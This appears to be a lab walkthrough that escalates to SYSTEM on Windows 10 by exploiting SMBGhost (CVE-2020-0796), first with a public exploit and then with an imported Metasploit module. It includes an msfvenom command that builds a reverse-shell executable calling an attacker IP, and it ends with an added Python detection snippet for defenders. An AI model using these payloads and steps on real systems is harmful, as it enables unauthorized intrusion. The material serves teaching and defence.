Windows 10 Privilege Escalation by Exploiting SMBGhost | CVE-2020-0796 | CoronaBlue

In my previous write-up I demonstrated CVE-2020-0796 detection using a Python-based script and an unofficial Nmap script, and then performed a Denial of Service (DoS) against my target Windows 10 system.

In this article I will focus on the privilege escalation part by exploiting SMBGhost/CVE-2020-0796/CoronaBlue.

Agenda

  • Privilege escalation by exploiting CVE-2020-0796/SMBGhost using a public exploit
  • Privilege escalation by exploiting CVE-2020-0796/SMBGhost using an external Metasploit module

Resources

Public Exploit

Metasploit Module

MSF injects the corresponding payload into the target system using a technique called “Reflective DLL Injection”, which is why a DLL file is needed. All the functions are implemented in the DLL file.

The corresponding MSF exploit is a post-exploitation module. That means it can only be triggered through a session that already exists on the target. We need to put the two files [.rb and DLL] in the correct folders. To find the correct folders, please go through the steps below.

To exploit this vulnerability we need two files. One is the MSF module, written in Ruby (.rb), and the other is a DLL file. I have given the info/download links for these two files in the Resources section above.

Note: To date, my updated MSF has no module for CVE-2020-0796. I am using BackBox Linux. If your up-to-date MSF has a module for SMBGhost, you can use that instead.

Disclaimer

This video is ONLY for educational & research purposes. Any misuse of the content of this video is strictly prohibited. Neither BugTestLab nor I will be accountable for any illegal activities.

Target System

  • Windows 10 x64 bit Version 1903
  • IP: 192.168.0.107

Attacker System

  • BackBox Linux
  • IP: 192.168.0.108

Public Exploit Execution

Step 1: Open CMD using “Run As Admin” and type “whoami” to check the current user’s privilege.

Step 2: Download the compiled public exploit to the target system and execute the main file [CVE-2020-0796\x64\cve-2020-0796-local.exe]. In my case I got an error about a missing DLL file.

Step 3: I downloaded the missing DLL and copied it to the folder in which the EXE exists.

Step 5: Now the executable runs smoothly and opens a command prompt. To check the privilege, “whoami” is the command 🙂 Got the SYSTEM shell.

MSF module import and execution

Step 1: I copied the two main files to my desktop on BackBox Linux.

Step 2: Open Metasploit and search for keywords like “smbghost”, “cve_2020_0796” or “cve-2020-0796”. You can see the result 🙁 Please remember the exploit count, which is 1937.

Step 3: Check the folder structure of the .rb file on the web. The same structure should be followed on the local machine where MSF is installed [modules/exploits/windows/local/].

Step 4: You will find two different main folders (metasploit & metasploit-framework) which contain the same folder path structure [modules/exploits/windows/local/].

Step 5: Now copy the cve_2020_0796_smbghost.rb file to these two folders.

Step 6: Go to the Metasploit console and type “reload_all”. This command reloads all modules that are present within the Metasploit installation folder.

I got a WARNING while reloading all plugins. If you are using Kali Linux, Parrot or another security distro, you might not get this warning.

Step 7: It seems my MSF has an issue with the AutoCheck module of MSF.

So I modified the file [/opt/metasploit/apps/pro/vendor/bundle/ruby/2.6.0/gems/metasploit-framework-4.17.92/modules/exploits/windows/local/cve_2020_0796_smbghost.rb] and commented out the “AutoCheck” line. That means I excluded that line as well as its functionality.

Step 8: When I performed reload_all again, it worked, and the exploit count increased by 1, which is expected with my new exploit: 1937 –> 1938

Step 9: Now it’s time to get a meterpreter session first. For that I prepared an executable with a meterpreter payload using msfvenom and copied that EXE to the target desktop:

sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 -f exe -o win10_mtrprtr.exe

Step 10: Use exploit/multi/handler to get the meterpreter session. Once the malicious EXE was clicked on the target, a meterpreter session was established.

Step 11: Type “shell” and check the privilege with “whoami”.

Step 12: Now it is time to use our newly imported MSF exploit. So first we will background our meterpreter shell and then USE our exploit.

Step 13: We only have to set the session ID, as this is mainly a post-exploitation module.

Step 14: When I ran “exploit”, I got an error.

Step 15: This is because until now we had not put the DLL file into any MSF folder. The reason is that I did not know which folder the DLL belongs in, so I was waiting for this kind of message. The message told me which folder I need to put the DLL in 🙂 From the error I found that a folder called CVE-2020-0796 needs to be created within “/opt/metasploit/apps/pro/vendor/bundle/ruby/2.6.0/gems/metasploit-framework-4.17.92/data/exploits/” and then I need to paste the DLL into that folder.

Step 16: Everything is set; now the “exploit” command will show its magic and open a command prompt. Just check the privilege now.
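
A defender-side view of the outcome shown in both walkthroughs above (a command prompt in the user's desktop session that answers “whoami” with SYSTEM), as an added example that is not part of the original post: the Python below filters process-creation events for command shells running as SYSTEM outside session 0. Field names follow Sysmon Event ID 1; the sample events, host name, user name and parent paths are constructed.

```python
import ntpath

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SYSTEM_USER = "NT AUTHORITY\\SYSTEM"  # English-locale account name (assumption)

# Constructed sample events using Sysmon Event ID 1 field names.
# Host, user and parent paths are made up for illustration.
SAMPLE_EVENTS = [
    # Normal elevated admin prompt: high integrity, still the user's account.
    {"Image": r"C:\Windows\System32\cmd.exe", "User": r"LAB-PC\alice",
     "IntegrityLevel": "High", "TerminalSessionId": 1,
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Outcome shown in the walkthrough: SYSTEM shell on the interactive desktop.
    {"Image": r"C:\Windows\System32\cmd.exe", "User": SYSTEM_USER,
     "IntegrityLevel": "System", "TerminalSessionId": 1,
     "ParentImage": r"C:\Users\alice\Desktop\sample.exe"},
    # Service-launched SYSTEM shell in session 0: common for maintenance scripts.
    {"Image": r"C:\Windows\System32\cmd.exe", "User": SYSTEM_USER,
     "IntegrityLevel": "System", "TerminalSessionId": 0,
     "ParentImage": r"C:\Windows\System32\services.exe"},
    # SYSTEM process in the user session that is not a shell.
    {"Image": r"C:\Windows\System32\winlogon.exe", "User": SYSTEM_USER,
     "IntegrityLevel": "System", "TerminalSessionId": 1,
     "ParentImage": r"C:\Windows\System32\smss.exe"},
]


def is_system_shell_in_user_session(event):
    """True for a command shell running as SYSTEM outside session 0."""
    image = ntpath.basename(event.get("Image", "")).lower()
    user = event.get("User", "").upper()
    session = int(event.get("TerminalSessionId", 0))
    return (image in SHELLS and user == SYSTEM_USER
            and event.get("IntegrityLevel") == "System" and session != 0)


def find_system_shells(events):
    """Return the events worth triaging; ParentImage is kept for context only,
    because the parent differs between escalation techniques."""
    return [e for e in events if is_system_shell_in_user_session(e)]


if __name__ == "__main__":
    for hit in find_system_shells(SAMPLE_EVENTS):
        print("ALERT", hit["Image"], hit["User"], "session",
              hit["TerminalSessionId"], "parent", hit["ParentImage"])
```

Admin tools that deliberately start an interactive SYSTEM shell will match as well, so treat hits as triage leads and review the parent process and logon session before escalating.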

Video PoC

Conclusion

We learned a lot today. This is good practice if you want to be a red team member/OSCP. Hope to meet you again. Till then, stay @home and stay safe.
